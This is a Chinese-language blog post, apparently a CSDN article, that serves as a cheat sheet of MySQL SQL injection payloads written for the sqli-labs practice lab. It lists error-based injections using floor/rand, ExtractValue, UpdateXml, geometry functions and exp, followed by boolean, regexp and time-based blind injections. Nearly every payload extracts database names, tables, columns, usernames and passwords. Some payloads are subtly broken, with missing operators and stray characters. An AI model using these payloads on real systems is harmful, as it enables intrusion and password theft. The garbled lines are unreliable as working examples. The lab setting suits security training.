sql注入

最新推荐文章于 2024-12-17 10:15:15 发布

原创最新推荐文章于 2024-12-17 10:15:15 发布 · 277 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql #数据库 #mysql

本文详细介绍了SQL注入攻击中基于报错的盲注方法，包括使用floor、ExtractValue、UpdateXml、geometrycollection等函数构造payload来获取数据库信息。同时，也提到了基于布尔和时间的SQL盲注技术，例如通过正则表达式和延时函数进行信息探测。

一.基于报错的 SQL 盲注------构造 payload 让信息通过错误提示回显出来
形如：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(floor(rand(0)2),(select (select (报错语句)) from information_schema.tables limit 0,1))x from information_schema.tables group by x)a)–+
1、通过floor报错,注入语句如下:
爆数据库：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

爆表：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

爆字段：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=‘users’ limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

爆用户名：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

爆密码：
http://127.0.0.1/sqlilabs/Less-5/?id=-1’ and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

2、通过ExtractValue报错,注入语句如下:
爆数据库：
and extractvalue(1, concat(0x5c, (select database()),0x5c));

爆表：
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c));

爆字段：
and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x5c));

爆用户：
and extractvalue(1, concat(0x5c, (select username from users limit 0,1)，0x5c));

爆密码：

and extractvalue(1, concat(0x5c, (select password from users limit 0,1)，0x5c));

3、通过UpdateXml报错,注入语句如下:

爆数据库：

and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1))

爆表：
and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1))

爆字段：
and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name=‘users’ limit 0,1),0x3a),1))

爆用户：
and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1))

爆密码：
and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1))

4.通过geometrycollection()报错,注入语句如下:

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.通过multipoint()报错,注入语句如下:

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.通过polygon()报错，注入语句如下：

select * from test where id=1 and polygon((select * from(select * from(select user())a)b))；

7.通过multipolygon()报错，注入语句如下:

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.通过linestring()报错，注入语句如下：

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.通过multilinestring()报错，注入语句如下：

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.通过exp()报错，注入语句如下：

select * from test where id=1 and exp(~(select * from(select user())a));

二.基于布尔 SQL 盲注----------构造逻辑判断
1：基于布尔 SQL 盲注----------构造逻辑判断
left(database(),1)>’s’ //left()函数
ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+
ascii(substr((select database()),1,1))=98ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23
▲regexp 正则注入
正则注入介绍：http://www.cnblogs.com/lcamry/articles/5717442.html
select user() regexp ‘¹’;
select user() regexp ‘²’;
select * from users where id=1 and 1=(if((user() regexp ‘^r’),1,0));select * from users where id=1 and 1=(user() regexp’^ri’);
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=‘security’ and table_name regexp ‘^us[a-z]’ limit 0,1);
3:基于时间的 SQL 盲注----------延时注入
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句，条件为假，执行 sleep